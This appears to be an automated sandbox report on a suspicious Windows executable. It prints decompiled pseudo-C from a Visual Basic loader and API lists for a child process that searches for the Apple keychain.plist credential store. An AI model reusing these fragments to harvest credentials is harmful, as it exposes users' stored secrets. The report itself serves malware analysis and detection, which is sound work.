0x0042d789
0x0042d7c2
0x0042d7c2
0x0042d7c7
0x0042d7c8
0x0042d7ca
0x0042d7cd
0x0042d7dc
0x0042d7ee
0x0042d7f3
0x0042d7de
0x0042d7e1
0x0042d7e6
0x0042d7e6
0x0042d7f9
0x0042d802
0x0042d80f
0x0042d819
0x0042d81e
0x0042d822
0x0042d825
0x0042d831
0x0042d836
0x0042d837
0x0042d839
0x0042d83c
0x0042d844
0x0042d84a
0x0042d84e
0x0042d854
0x0042d85a
0x0042d85d
0x0042d860
0x0042d866
0x0042d86b
0x0042d870
0x0042d879
0x0042d885
0x0042d827
0x0042d827
0x0042d82e
0x0042d82e
0x0042d78b
0x0042d797
0x0042d79c
0x0042d7ba
0x0042d7bf
0x0042d7bf
0x0042d789
0x0042d746
0x0042d74c
0x0042d755
0x00000000
0x0042d755
0x0042d744
0x0042d730

APIs

__vbaErrorOverflow.MSVBVM60(?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976), ref: 0042D717
__vbaChkstk.MSVBVM60(?,0042D61C,00000000,?,?,?), ref: 0042D722
__vbaErrorOverflow.MSVBVM60(?,?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000), ref: 0042D75F
__vbaChkstk.MSVBVM60(?,0042D97F,?,00000000,?,?,0042D976,?,?,?,0042D73A,?,?,0042D61C,00000000,?), ref: 0042D76A
__vbaI2I4.MSVBVM60(?,?,?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000), ref: 0042D797
__vbaErrorOverflow.MSVBVM60(?,0042D97F,?,00000000,?,?,0042D976,?,?,?,0042D73A,?,?,0042D61C,00000000,?), ref: 0042D7C2
__vbaChkstk.MSVBVM60(?,?,0042D97F,?,00000000,?,?,0042D976,?,?,?,0042D73A,?,?,0042D61C,00000000), ref: 0042D7CD
__vbaI2I4.MSVBVM60(?,?,0042D97F,?,00000000,?,?,0042D976,?,?,?,0042D73A,?,?,0042D61C,00000000), ref: 0042D7F9
__vbaI2I4.MSVBVM60(?,00000000,?,?,?,?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F), ref: 0042D819
__vbaErrorOverflow.MSVBVM60(00000000,?,00000000,?,?,?,?,0042D8AC,?,00000000,?,0042D807,?,00000000), ref: 0042D831
__vbaChkstk.MSVBVM60(?,0042B7B3), ref: 0042D83C
#644.MSVBVM60(?,?,0042B7B3), ref: 0042D866

Part of subcall function 0042D886: __vbaUI1I2.MSVBVM60(?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976,?,?,?,0042D73A), ref: 0042D89E
Part of subcall function 0042D886: __vbaUI1I4.MSVBVM60(?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976,?,?), ref: 0042D8BF

Strings

T`, xrefs: 0042D707, 0042D84E, 0042D854

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkErrorOverflow$#644
String ID: T`
API String ID: 1444328250-1416193786
Opcode ID: e950402dbca81677f06f1d14aa66f8c03247d214b5533b0ad1ae679fe4deb7d8
Instruction ID: 073afd3cdb9ea85f95d3bcc5daac5acc492e644e0e0ed24dd78d91818b2d8ea6
Opcode Fuzzy Hash: e950402dbca81677f06f1d14aa66f8c03247d214b5533b0ad1ae679fe4deb7d8
Instruction Fuzzy Hash: CA418434B00259A6CB14BB75E953AAD77B8AF44744F80403BF945EF2A2D63CDA41C76C

Uniqueness

Uniqueness Score: -1.00%

Function 0042C0A0, Relevance: 22.6, APIs: 15, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0042C0A0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr _v52;
				void* _v56;
				signed int _v60;
				void* _v64;
				char _v80;
				char _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				signed short _v120;
				intOrPtr* _v124;
				signed int _v128;
				signed int _v132;
				signed char _t59;
				signed short _t60;
				signed int _t66;
				signed int _t71;
				intOrPtr _t96;

				_push(0x401326);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t96;
				_push(0x70);
				L00401320();
				_v12 = _t96;
				_v8 = 0x401228;
				L0040158A();
				L0040158A();
				_push( &_v80);
				L00401452();
				_push(1);
				_push( &_v80);
				_t59 =  &_v96;
				_push(_t59);
				L00401458();
				L004014CA();
				L004015A8();
				L00401530();
				_t60 = _t59 & 0x000000ff;
				if(_t60 != 0xb6) {
					_push(2);
					L0040144C();
					L004015B4();
					if( *0x42f414 != 0) {
						_v124 = 0x42f414;
					} else {
						_push(0x42f414);
						_push(0x410160);
						L004015A2();
						_v124 = 0x42f414;
					}
					_v100 =  *_v124;
					_t66 =  *((intOrPtr*)( *_v100 + 0x14))(_v100,  &_v64);
					asm("fclex");
					_v104 = _t66;
					if(_v104 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x410150);
						_push(_v100);
						_push(_v104);
						L004015C6();
						_v128 = _t66;
					}
					_v108 = _v64;
					_t71 =  *((intOrPtr*)( *_v108 + 0x110))(_v108,  &_v60);
					asm("fclex");
					_v112 = _t71;
					if(_v112 >= 0) {
						_v132 = _v132 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x410170);
						_push(_v108);
						_push(_v112);
						L004015C6();
						_v132 = _t71;
					}
					_t60 = _v60;
					_v120 = _t60;
					_v60 = _v60 & 0x00000000;
					L004015B4();
					L004015C0();
				}
				_v52 = 0x7ac75b;
				_push(0x42c253);
				L00401578();
				L004015A8();
				L00401578();
				L00401578();
				L00401578();
				return _t60;
			}

0x0042c0a5
0x0042c0b0
0x0042c0b1
0x0042c0b8
0x0042c0bb
0x0042c0c3
0x0042c0c6
0x0042c0d3
0x0042c0de
0x0042c0e6
0x0042c0e7
0x0042c0ec
0x0042c0f1
0x0042c0f2
0x0042c0f5
0x0042c0f6
0x0042c101
0x0042c109
0x0042c112
0x0042c117
0x0042c11f
0x0042c125
0x0042c127
0x0042c131
0x0042c13d
0x0042c157
0x0042c13f
0x0042c13f
0x0042c144
0x0042c149
0x0042c14e
0x0042c14e
0x0042c163
0x0042c172
0x0042c175
0x0042c177
0x0042c17e
0x0042c197
0x0042c180
0x0042c180
0x0042c182
0x0042c187
0x0042c18a
0x0042c18d
0x0042c192
0x0042c192
0x0042c19e
0x0042c1ad
0x0042c1b3
0x0042c1b5
0x0042c1bc
0x0042c1d8
0x0042c1be
0x0042c1be
0x0042c1c3
0x0042c1c8
0x0042c1cb
0x0042c1ce
0x0042c1d3
0x0042c1d3
0x0042c1dc
0x0042c1df
0x0042c1e2
0x0042c1ec
0x0042c1f4
0x0042c1f4
0x0042c1f9
0x0042c200
0x0042c22d
0x0042c235
0x0042c23d
0x0042c245
0x0042c24d
0x0042c252

APIs

__vbaChkstk.MSVBVM60(?,00401326), ref: 0042C0BB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042C0D3
__vbaStrCopy.MSVBVM60(?,?,?,?,00401326), ref: 0042C0DE
#610.MSVBVM60(?,?,?,?,?,00401326), ref: 0042C0E7
#552.MSVBVM60(?,?,00000001,?,?,?,?,?,00401326), ref: 0042C0F6
__vbaVarMove.MSVBVM60(?,?,00000001,?,?,?,?,?,00401326), ref: 0042C101
__vbaFreeVar.MSVBVM60(?,?,00000001,?,?,?,?,?,00401326), ref: 0042C109
__vbaUI1I2.MSVBVM60(?,?,00000001,?,?,?,?,?,00401326), ref: 0042C112
#537.MSVBVM60(00000002,?,?,00000001,?,?,?,?,?,00401326), ref: 0042C127
__vbaStr.MSVBVM60(00000002,?,?,00000001,?,?,?,?,?,00401326), ref: 0042C131
__vbaNew2.MSVBVM60(00410160,0042F414,00000002,?,?,00000001,?,?,?,?,?,00401326), ref: 0042C149
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410150,00000014), ref: 0042C18D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00410170,00000110), ref: 0042C1CE
__vbaStr.MSVBVM60(00000000,?,00410170,00000110), ref: 0042C1EC
__vbaFreeVar.MSVBVM60(0042C253,?,?,00000001,?,?,?,?,?,00401326), ref: 0042C235

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckCopyFreeHresult$#537#552#610ChkstkMoveNew2
String ID:
API String ID: 3633122755-0
Opcode ID: 363c9896ee7d8b4254fe7e6c3841c7ea0e7965837e20b19b72e8fe8c805d0c80
Instruction ID: b07b99700a6071b9b9374251856739b3621099f70e4ae72394faf5b0c2e7a2e9
Opcode Fuzzy Hash: 363c9896ee7d8b4254fe7e6c3841c7ea0e7965837e20b19b72e8fe8c805d0c80
Instruction Fuzzy Hash: D0410A71D00218EFDB14EFA1D986ADEBBB4AF44308FA0443AF1067B1A2DB785945CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0042D90E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0042D90E(intOrPtr _a4) {
				intOrPtr _v0;
				char _v8;
				short _v12;
				char _v16;
				void* _t15;
				intOrPtr _t25;

				_push(4);
				L00401320();
				if( *0x42f044 == 0) {
					L3:
					return _v8;
				} else {
					_t15 = _a4 -  *0x42f040;
					if(_t15 < 0) {
						L004014BE();
						_push(8);
						L00401320();
						if( *0x42f044 != 0) {
							_v16 = E0042D90E(_v0);
							_t21 = _v0 + 1;
							if(_v0 + 1 < 0) {
								L004014BE();
								asm("sahf");
								asm("sahf");
								asm("sahf");
								asm("sahf");
								asm("invalid");
								asm("invalid");
								asm("invalid");
								goto [far dword [ebx+ebx*8+0x10000002];
							}
							_v12 = E0042D764(_v16, E0042D90E(_t21));
						}
						return _v12;
					} else {
						_t25 =  *0x42f034; // 0x605420
						_v8 =  *((intOrPtr*)(_t25 + _t15));
						goto L3;
					}
				}
			}

0x0042d911
0x0042d914
0x0042d922
0x0042d93b
0x0042d93f
0x0042d924
0x0042d927
0x0042d92d
0x0042d942
0x0042d94a
0x0042d94d
0x0042d95b
0x0042d965
0x0042d96b
0x0042d96e
0x0042d98b
0x0042d990
0x0042d991
0x0042d992
0x0042d993
0x0042d999
0x0042d99b
0x0042d99d
0x0042d99f
0x0042d99f
0x0042d97f
0x0042d97f
0x0042d988
0x0042d92f
0x0042d92f
0x0042d938
0x00000000
0x0042d938
0x0042d92d

APIs

__vbaChkstk.MSVBVM60(?,0042D965,?,?,0042D73A,?,?,0042D61C,00000000,?,?,?), ref: 0042D914
__vbaErrorOverflow.MSVBVM60(?,0042D965,?,?,0042D73A,?,?,0042D61C,00000000,?,?,?), ref: 0042D942
__vbaChkstk.MSVBVM60(?,0042D73A,?,?,0042D61C,00000000,?,?,?), ref: 0042D94D
__vbaErrorOverflow.MSVBVM60(?,?,0042D965,?,?,0042D73A,?,?,0042D61C,00000000,?,?,?), ref: 0042D98B

Strings

T`, xrefs: 0042D92F

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkErrorOverflow
String ID: T`
API String ID: 4223052453-1416193786
Opcode ID: b20c5eb39922aff3034264ab43fcaa8df81451858a68df8c5f28e77d09ce591f
Instruction ID: 6dfd6760bb2029e516e723e72bc23079a30c50e34e077e1ffcbd435953de15f0
Opcode Fuzzy Hash: b20c5eb39922aff3034264ab43fcaa8df81451858a68df8c5f28e77d09ce591f
Instruction Fuzzy Hash: 61018474B00259AACB10ABB1FD419AD7B785B01B48B80417AF944E7263C53CDA82D76C

Uniqueness

Uniqueness Score: -1.00%

Function 0042D8DC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0042D8DC(signed short _a4, signed short _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				signed int _t17;
				void* _t22;
				char _t24;
				void* _t27;
				intOrPtr _t32;
				void* _t36;
				void* _t38;

				_push(4);
				L00401320();
				_t17 = _a8 * 0x10000;
				if(_t17 < 0) {
					L004014BE();
					_t36 = _t38;
					_push(4);
					L00401320();
					if( *0x42f044 == 0) {
						L6:
						return _v12;
					} else {
						_t22 = _v0 -  *0x42f040;
						if(_t22 < 0) {
							L004014BE();
							_push(_t36);
							_push(8);
							L00401320();
							_t24 =  *0x42f044;
							if(_t24 != 0) {
								_push(_v4);
								L3();
								_v20 = _t24;
								_t27 = _v4 + 1;
								if(_t27 < 0) {
									L004014BE();
									asm("sahf");
									asm("sahf");
									asm("sahf");
									asm("sahf");
									asm("invalid");
									asm("invalid");
									asm("invalid");
									goto [far dword [ebx+ebx*8+0x10000002];
								}
								_push(_t27);
								L3();
								_v16 = E0042D764(_v20, _t27);
							}
							return _v16;
						} else {
							_t32 =  *0x42f034; // 0x605420
							_v12 =  *((intOrPtr*)(_t32 + _t22));
							goto L6;
						}
					}
				} else {
					_v8 = _t17 | _a4 & 0x0000ffff;
					return _v8;
				}
			}

0x0042d8df
0x0042d8e2
0x0042d8eb
0x0042d8f1
0x0042d909
0x0042d90f
0x0042d911
0x0042d914
0x0042d922
0x0042d93b
0x0042d93f
0x0042d924
0x0042d927
0x0042d92d
0x0042d942
0x0042d947
0x0042d94a
0x0042d94d
0x0042d952
0x0042d95b
0x0042d95d
0x0042d960
0x0042d965
0x0042d96b
0x0042d96e
0x0042d98b
0x0042d990
0x0042d991
0x0042d992
0x0042d993
0x0042d999
0x0042d99b
0x0042d99d
0x0042d99f
0x0042d99f
0x0042d970
0x0042d971
0x0042d97f
0x0042d97f
0x0042d988
0x0042d92f
0x0042d92f
0x0042d938
0x00000000
0x0042d938
0x0042d92d
0x0042d8f3
0x0042d8ff
0x0042d906
0x0042d906

APIs

__vbaChkstk.MSVBVM60(?,0042D755,?,00000000,?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?), ref: 0042D8E2
__vbaErrorOverflow.MSVBVM60(?,0042D755,?,00000000,?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?), ref: 0042D909
__vbaChkstk.MSVBVM60(?,0042D965,?,?,0042D73A,?,?,0042D61C,00000000,?,?,?), ref: 0042D914

Strings

T`, xrefs: 0042D92F

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$ErrorOverflow
String ID: T`
API String ID: 290963686-1416193786
Opcode ID: 131c9d456a7d552513bab3c3e1288d57cbfceea42843f733d54ca0a15e52ad72
Instruction ID: 489df2801fa240441cfcd44d788361d8890ba6b34aa8aae72474679bcddf9780
Opcode Fuzzy Hash: 131c9d456a7d552513bab3c3e1288d57cbfceea42843f733d54ca0a15e52ad72
Instruction Fuzzy Hash: E3F0F630700209A9C714DB65F54167D7BB49B11788F90403AFA45EB192D17CC682C318

Uniqueness

Uniqueness Score: -1.00%

Function 0042D886, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 21%

			E0042D886(intOrPtr _a4, signed short _a8) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				short _v20;
				char _v24;
				char _t23;
				void* _t29;
				signed int _t32;
				void* _t37;
				char _t39;
				void* _t42;
				intOrPtr _t52;
				void* _t57;
				void* _t58;
				void* _t60;

				_t23 =  *0x42f044;
				if(_t23 == 0) {
					return _t23;
				} else {
					L00401530();
					E0042D6EE(_a4, _t23);
					asm("cdq");
					L004015DE();
					_push((_a8 & 0x0000ff00) / 0x100);
					_t29 = _a4 + 1;
					if(_t29 >= 0) {
						_push(_t29);
						return E0042D6EE();
					}
					L004014BE();
					_t57 = _t60;
					_push(4);
					L00401320();
					_t32 = _v0 * 0x10000;
					if(_t32 < 0) {
						L004014BE();
						_push(_t57);
						_t58 = _t60;
						_push(4);
						L00401320();
						if( *0x42f044 == 0) {
							L11:
							return _v16;
						} else {
							_t37 = _v4 -  *0x42f040;
							if(_t37 < 0) {
								L004014BE();
								_push(_t58);
								_push(8);
								L00401320();
								_t39 =  *0x42f044;
								if(_t39 != 0) {
									_push(_v8);
									L8();
									_v24 = _t39;
									_t42 = _v8 + 1;
									if(_t42 < 0) {
										L004014BE();
										asm("sahf");
										asm("sahf");
										asm("sahf");
										asm("sahf");
										asm("invalid");
										asm("invalid");
										asm("invalid");
										goto [far dword [ebx+ebx*8+0x10000002];
									}
									_push(_t42);
									L8();
									_v20 = E0042D764(_v24, _t42);
								}
								return _v20;
							} else {
								_t52 =  *0x42f034; // 0x605420
								_v16 =  *((intOrPtr*)(_t52 + _t37));
								goto L11;
							}
						}
					} else {
						_v12 = _t32 | _v0 & 0x0000ffff;
						return _v12;
					}
				}
			}

0x0042d889
0x0042d892
0x0042d8d4
0x0042d894
0x0042d89e
0x0042d8a7
0x0042d8b5
0x0042d8bf
0x0042d8c4
0x0042d8c8
0x0042d8cb
0x0042d8cd
0x00000000
0x0042d8ce
0x0042d8d7
0x0042d8dd
0x0042d8df
0x0042d8e2
0x0042d8eb
0x0042d8f1
0x0042d909
0x0042d90e
0x0042d90f
0x0042d911
0x0042d914
0x0042d922
0x0042d93b
0x0042d93f
0x0042d924
0x0042d927
0x0042d92d
0x0042d942
0x0042d947
0x0042d94a
0x0042d94d
0x0042d952
0x0042d95b
0x0042d95d
0x0042d960
0x0042d965
0x0042d96b
0x0042d96e
0x0042d98b
0x0042d990
0x0042d991
0x0042d992
0x0042d993
0x0042d999
0x0042d99b
0x0042d99d
0x0042d99f
0x0042d99f
0x0042d970
0x0042d971
0x0042d97f
0x0042d97f
0x0042d988
0x0042d92f
0x0042d92f
0x0042d938
0x00000000
0x0042d938
0x0042d92d
0x0042d8f3
0x0042d8ff
0x0042d906
0x0042d906
0x0042d8f1

APIs

__vbaUI1I2.MSVBVM60(?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976,?,?,?,0042D73A), ref: 0042D89E
__vbaUI1I4.MSVBVM60(?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976,?,?), ref: 0042D8BF
__vbaErrorOverflow.MSVBVM60(00000000,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976,?), ref: 0042D8D7
__vbaChkstk.MSVBVM60(?,0042D755,?,00000000,?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?), ref: 0042D8E2

Part of subcall function 0042D6EE: __vbaErrorOverflow.MSVBVM60(?,0042D8AC,?,00000000,?,0042D807,?,00000000,?,?,0042D97F,?,00000000,?,?,0042D976), ref: 0042D717
Part of subcall function 0042D6EE: __vbaChkstk.MSVBVM60(?,0042D61C,00000000,?,?,?), ref: 0042D722

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkErrorOverflow
String ID:
API String ID: 4223052453-0
Opcode ID: 9b3aec526d8426a563286ce38e8d8f30154de0562ddfea490a0e6a4095401e8e
Instruction ID: 7e838b5d13472a4c54bf6497e91b999816b17a4b3a0a32d11bd23271ef69f3bc
Opcode Fuzzy Hash: 9b3aec526d8426a563286ce38e8d8f30154de0562ddfea490a0e6a4095401e8e
Instruction Fuzzy Hash: 6FF08131B00619A6CB04ABA5ED42B7E3699DF44744F40803BB91ADE192E97CDA90C25C

Uniqueness

Uniqueness Score: -1.00%

Function 0042D836, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042D836() {
				signed int _v8;
				signed int _t8;
				char _t10;
				signed int _t13;
				intOrPtr _t15;
				intOrPtr _t17;

				_push(4);
				L00401320();
				_t8 = 1;
				_t13 = 1;
				_t15 =  *0x42f034; // 0x605420
				_t17 =  *0x42f034; // 0x605420
				_t10 =  *((intOrPtr*)(_t17 + _t8 * 0xffffffff));
				 *((char*)(_t15 + _t13 * 0xffffffff)) = _t10;
				_push( *0x42f034);
				L004013B6();
				 *0x42f040 = _t10;
				_v8 = _v8 | 0x0000ffff;
				 *0x42f044 = _v8;
				return _v8;
			}

0x0042d839
0x0042d83c
0x0042d844
0x0042d84a
0x0042d84e
0x0042d854
0x0042d85a
0x0042d85d
0x0042d860
0x0042d866
0x0042d86b
0x0042d870
0x0042d879
0x0042d885

APIs

__vbaChkstk.MSVBVM60(?,0042B7B3), ref: 0042D83C
#644.MSVBVM60(?,?,0042B7B3), ref: 0042D866

Strings

T`, xrefs: 0042D707, 0042D84E, 0042D854

Memory Dump Source

Source File: 00000000.00000002.463862352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.463827063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470200386.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470229501.0000000000431000.00000002.00020000.sdmp Download File

Similarity

API ID: #644Chkstk__vba
String ID: T`
API String ID: 3537395942-1416193786
Opcode ID: 5088973f068d8a2db2dd79eef5fd99e0e69aa575f2b5015bd9ffe3534639a891
Instruction ID: ac2faff2e96f5cebdb34f91dec3eb9773bdad90c478364e8ca47bef54fdbaf1e
Opcode Fuzzy Hash: 5088973f068d8a2db2dd79eef5fd99e0e69aa575f2b5015bd9ffe3534639a891
Instruction Fuzzy Hash: CDF0A73D20124195C7346B64AE12698BB749B09750F90007AFB01AF2B3D7705947D758

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: g4FtSOZMD9.exe PID: 5524 Parent PID: 5452 g4FtSOZMD9.exeCOMMON

Executed Functions

Function 0044553B, Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004455C2
wcsrchr.MSVCRT ref: 004455DA
memset.MSVCRT ref: 0044570D
memset.MSVCRT ref: 00445725
memset.MSVCRT ref: 0044573D
memset.MSVCRT ref: 00445755
memset.MSVCRT ref: 004458CB
memset.MSVCRT ref: 004458E3
memset.MSVCRT ref: 0044596E
memset.MSVCRT ref: 00445986
memset.MSVCRT ref: 00445A10
memset.MSVCRT ref: 00445A28
memset.MSVCRT ref: 00445AC6

Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7

memset.MSVCRT ref: 00445B52
memset.MSVCRT ref: 00445B6A
memset.MSVCRT ref: 00445B82
memset.MSVCRT ref: 00445C9B
memset.MSVCRT ref: 00445CB3
_wcsicmp.MSVCRT ref: 00445D56

Strings

Apple Computer\Preferences\keychain.plist, xrefs: 00445CD0
*.*, xrefs: 00445ED0

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: memset$??2@??3@CloseFileHandleSize_wcsicmpwcsrchr
String ID: *.*$Apple Computer\Preferences\keychain.plist
API String ID: 3127916678-3798722523
Opcode ID: 8bb463e680faf0bb04203aea12b6b8140b67f2e8c55064e4a0f91d13c3c605a3
Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
Opcode Fuzzy Hash: 8bb463e680faf0bb04203aea12b6b8140b67f2e8c55064e4a0f91d13c3c605a3
Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004447D9, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0044480A
_snwprintf.MSVCRT ref: 0044488A
wcscpy.MSVCRT ref: 004448B4
??3@YAXPAX@Z.MSVCRT ref: 00444964

Strings

FileVersion, xrefs: 004448E2
OriginalFileName, xrefs: 0044494B
%4.4X%4.4X, xrefs: 0044487F
InternalName, xrefs: 00444921
CompanyName, xrefs: 0044490C
040904E4, xrefs: 004448AE
ProductVersion, xrefs: 004448F7
LegalCopyright, xrefs: 00444936
\VarFileInfo\Translation, xrefs: 00444864
FileDescription, xrefs: 004448CD
ProductName, xrefs: 004448BB

Memory Dump Source

Source File: 00000015.00000001.607183345.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000001.607461867.0000000000459000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607478027.000000000045D000.00000040.00020000.sdmp Download File
Associated: 00000015.00000001.607493854.0000000000473000.00000040.00020000.sdmp Download File

Similarity

API ID: ??2@??3@_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 2899246560-1542517562
Opcode ID: ad386762ed52d62486fecb103d4e168bd183536beb44a1e4c29c29faa91a3d45
Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
Opcode Fuzzy Hash: ad386762ed52d62486fecb103d4e168bd183536beb44a1e4c29c29faa91a3d45
Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0042F5F4, Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0042F5F4(void* __edx, void* __fp0, intOrPtr _a4, void* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void** _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void** _t95;
				void* _t99;
				void* _t101;
				void* _t107;
				void* _t108;
				void* _t111;
				void* _t112;
				void* _t116;
				void* _t120;
				void* _t122;
				intOrPtr _t125;
				signed int _t127;
				void* _t136;
				void* _t137;
				signed int _t139;
				void* _t145;
				void* _t149;
				void* _t153;
				intOrPtr _t156;
				void* _t160;
				void* _t162;
				void** _t165;
				signed int _t167;
				intOrPtr _t168;
				void* _t169;
				void* _t170;
				void* _t181;

				_t181 = __fp0;
				_t158 = __edx;
				_t95 = _a4 + 8;
				_t169 =  *_t95;
				_t135 = 0;
				_v12 = 0;
				_v24 = _t95;
				_v8 = 0;
				_v16 = E00424FF0( *_a12);
				_a12 = E00424FF0( *((intOrPtr*)(_a12 + 4)));
				if(_v16 == 0) {
					_v16 = 0x44e5ef;
				}
				if(_a12 == _t135) {
					_a12 = 0x44e5ef;
				}
				_t99 =  *(_t169 + 0x64);
				_t162 =  *(_t169 + 4);
				_t142 = _t99 + 2;
				if(_t162 < _t99 + 2) {
					__eflags =  *((intOrPtr*)(_t169 + 0x1c)) - _t135;
					if( *((intOrPtr*)(_t169 + 0x1c)) != _t135) {
						__eflags = _t162;
						if(_t162 <= 0) {
							L14:
							_t100 =  *(_t169 + 8);
							_t143 = _t169 + 0x1a8;
							__eflags =  *(_t169 + 8) - _t169 + 0x1a8;
							if(__eflags != 0) {
								_push(_t162 + 1 << 4);
								_t101 = L00415B2C(_t100, _t135, _t169, _t158, _t169);
								_t136 = _t101;
								__eflags = _t136;
								_pop(_t145);
								if(_t136 == 0) {
									goto L53;
								}
								L19:
								 *(_t169 + 8) = _t136;
								_t137 = _t136 + ( *(_t169 + 4) << 4);
								memset(_t137, 0, 0x10);
								_push( *(_t169 + 0x10) | 0x00000100);
								_push(0);
								_t30 = _t137 + 4; // 0x4
								_t165 = _t30;
								_push(_t165);
								_push(_t169);
								_push(_v16);
								_t107 = E0041EED2(_t145, _t158, _t181);
